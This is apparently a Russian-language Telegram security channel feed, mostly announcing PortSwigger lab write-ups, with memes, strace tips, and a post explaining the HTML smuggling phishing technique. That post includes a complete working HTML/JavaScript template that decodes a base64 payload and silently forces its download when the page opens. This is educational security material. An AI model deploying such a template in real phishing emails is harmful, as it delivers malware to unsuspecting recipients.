Coffee cube
295 subscribers
121 photos
17 videos
24 files
84 links
Этот канал посвещен моему пути в сфере Информационной безопасности.

Выкладываю статьи по моим исследованиям, райтапы на лабораторные работы и забавные истории. Присоединяйтесь^3

По всем вопросам можете писать мне в ЛС: @ju57_4_cu63
Download Telegram
User_ID_controlled_by_request_parameter,_with_unpredictable_user.pdf
4.1 MB
Привет^3

Выкладывают новый разбор лабораторной от Port Swigger Academy. Она похожа на предыдущую, но с некоторым усложнением.

#writeup #web@coffee_cube
21👍1👨‍💻1
Привет^3

Недавно я уже писал о том, что написание своего малваря не является хорошей идеей. Тем более, если вы ничего в этом не понимаете.

Очередной мамкин хакер решил написать кейлоггер на питоне, но столкнулся с проблеймой: Как создать exe файл. Ничего лучше, чем попросить кого-то другого сделать это за него он не придумал.

Что могло пойти не так?) Ведь каждый с удовольствием запустит кейлоггер у себя на компе, чтобы помочь незнакомцу. Ну и в чем я не прав?

Помимо этого, он скинул исходник вместе с API-key для телеграм бота...

Может кому-то не очивидно, но не стоит делиться паролями и ключами с другими людьми. Хранить их в коде и на гите тоже не стоит.

#memes@coffee_cube
😁91👌1
User role controlled by request parameter.pdf
378.6 KB
Привет^3

Продолжаю решать лабы на Port Swigger Academy. Пока-что выкладываю разборы для вводных заданий. Но уже на готове есть более сложные и интересные задачи.

#writeup #web@coffee_cube
🔥41👨‍💻1
Unprotected admin functionality with unpredictable URL.pdf
147.4 KB
Привет^3

Продолжаю решать веб. К выходным готовлю материалы по Си и Linux. Так что готовьтесь погрузиться в необъятное)

#writeup #web@coffee_cube
👨‍💻4🫡31
Сокрытие LKM модуля в ОС Linux.pdf
447.5 KB
Привет^3

Вот и настал тот день, когда я поделюсь частью своих заний по моему основному направлению работы - анализу вирусов. Я описал методы сокрытия LKM-руткитов в OC Linux и привел код для тестов.

Это материал сложнее предыдущих, но в то же время и интереснее. Подготовка занимает сильно больше времени, поэтому буду рад услышать от вас обратную связь:3

Приятного чтения)

#C@coffee_cube #linux@coffee_cube
4🔥4👨‍💻21
Coffee cube pinned «Всем привет^3 С момента создания блога я долго думал, о чём же писать. Первой мыслью было описание пути достижения поставленных мною целей, но не всегда очевидно, что из этого интересно, а что — нет. И спустя почти полгода я определился, поэтому предлагаю…»
User_ID_controlled_by_request_parameter_with_password_disclosure.pdf
305.1 KB
Привет^3

Продолжаю выкладывать серию райтапов по Port Swigger Academy. Подошли к середине задач из подборки по уявимостям серверной части. Path traversal и Access control уже пройдены. Следующими будут разборы задач на Authentication.

#web #writeup@coffee_cube
🔥5🎉4🤔2👨‍💻1
Username enumeration via different responses.pdf
277.9 KB
Привет^3

Новый разбор задачи из Port Swigger Academy. В ней можно поработать с инструментом ffuf для подбора логинов пользователей.

#web #writeup@coffee_cube
🔥3👨‍💻31
Привет^3

Вы тоже ломали WiFi с помощью питона на продленке в школе?

#memes@coffee_cube
41👨‍💻1
2FA simple bypass.pdf
159.2 KB
Привет^3

Новый день - новый разбор лаб от Port Swigger Academy.

#web #writeup@coffee_cube
5👨‍💻21
Basic SSRF against the local server.pdf
146 KB
Привет^3

Сегодня будет разбор простой лабы с уязвимостью SSRF от Port Swigger Academy. Для ее решения удобно использовать инстремент Burp Suite. Он пригодится для решения дальнейших лаб.

#web #writeup@coffee_cube
👨‍💻31🔥1
Basic SSRF against another back-end system.pdf
134.7 KB
Привет^3

Сегодня будет разбор более сложная версия лабы с SSRF. Для ее решения пригодится Burp Suite. Следующие разборы будут об уязвимостях, которые возникают при загрузке файлов)

#web #writeup@coffee_cube
🔥4👨‍💻21
Привет^3

Решил постепенно рассказывать о утилитах и инструментах, которые использую в работе. Одна из таких утилит - strace. Она используется для отслеживания системных вызовов, которые использует исполняемый файл. Это информация помогает писать поведенческией правила для малварей, а так же просто при динамическом анализе. Далее приведен список флагов, которые чаще всего пригождаются мне в работе.

Полезные флаги

- -p - присоединиться к работающему процессу;
- -e - указать список отслеживаемых вызовов;


strace -e trace=network,read,write /path/to/app args


- -f - следование fork() ;
- -P - собирать системные вызовы связанные с конкретным файлом или дирикторией;


strace -P /etc/passwd cat /etc/passwd


#tool@coffee_cube
🔥3👨‍💻31
Remote code execution via web shell upload.pdf
119.3 KB
Привет^3

Сегодня будет разбор лабы с уязвимостью при загрузке изображения. Так совпало, что у моей прекрасной кошки сегодня ДР) Поэтому в качестве бонуса приложу фотку, которую я использовал в некоторых лабах Port Swigger )

#web #writeup@coffee_cube
8🔥4🎉3👨‍💻1
Web shell upload via Content-Type restriction bypass.pdf
242.9 KB
Привет^3

Вторая лаба на тему тестирования загрузки файлов от Port Swigger Academy. Далее пойду разборы лаб на темы инъекций.

Как раз для этой лабы я начал применять изображение котейки из прошлого поста:3

#web #writeup
@coffee_cube
👍2👨‍💻1
И такое бывает...^3

#memes@coffee_cube
🤣10🔥1🐳1👾1
Media is too big
VIEW IN TELEGRAM
Привет^3

Сегодня я расскажу о другой части моей работы - Phishing.

Фишинг - это отправка мошеннических электронных писем с целью повлиять на жертву или заставить ее предоставить информацию , открытый файл или перейти по ссылкам.

Одной из актуальных техник является HTML Smuggling. Используя HTML5 и JavaScript можно доставить вредоносный файл на хост внутри HTML файла. В нем может содержаться большой бинарный объект JavaScript Blobs.

Blob

Неизменяемый объект, который представляет собой необработанные данные.


var myBlob = new Blob([myData], {type: 'octet/stream'});


Это создает Blob типа MIME octet/stream и заполняет данные, содержащиеся в myData.

Затем создается URL адрес из объекта Blob:


var myUrl = window.URL.createObjectURL(blob);
myAnchror.href = myUrl;


Далее, можно имитировать щелчок на якорном объекте с помощью метода HTMLElement.click():


myAnchor.click()


Пример

В данном примере содержимое файла будет закодировано в base64. В других постах приведу другие примеры для данной техники:3


<html>
<head>
<title>HTML smuggling demo</title>
</head>
<body>
<script>
function base64ToArrayBuffer(base64) {
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array( len );
for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
return bytes.buffer;
}

var file = <!--payload in base64-->
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], {type: 'octet/stream'});
var fileName = 'payload.txt';

if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);
else {
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileName;
a.click();
window.URL.revokeObjectURL(url);
}
</script>
</body>
</html>


#phishing@coffee_cube
👨‍💻21🔥1🤝1
Привет^3

Я считают, что отличный вариант названия тех, кто считает себе хакером, после скачивания Kali Linux. Звучит гордо - калисты...

#memes@coffee_cube
😁6🐳2😈1👨‍💻1💅1😎1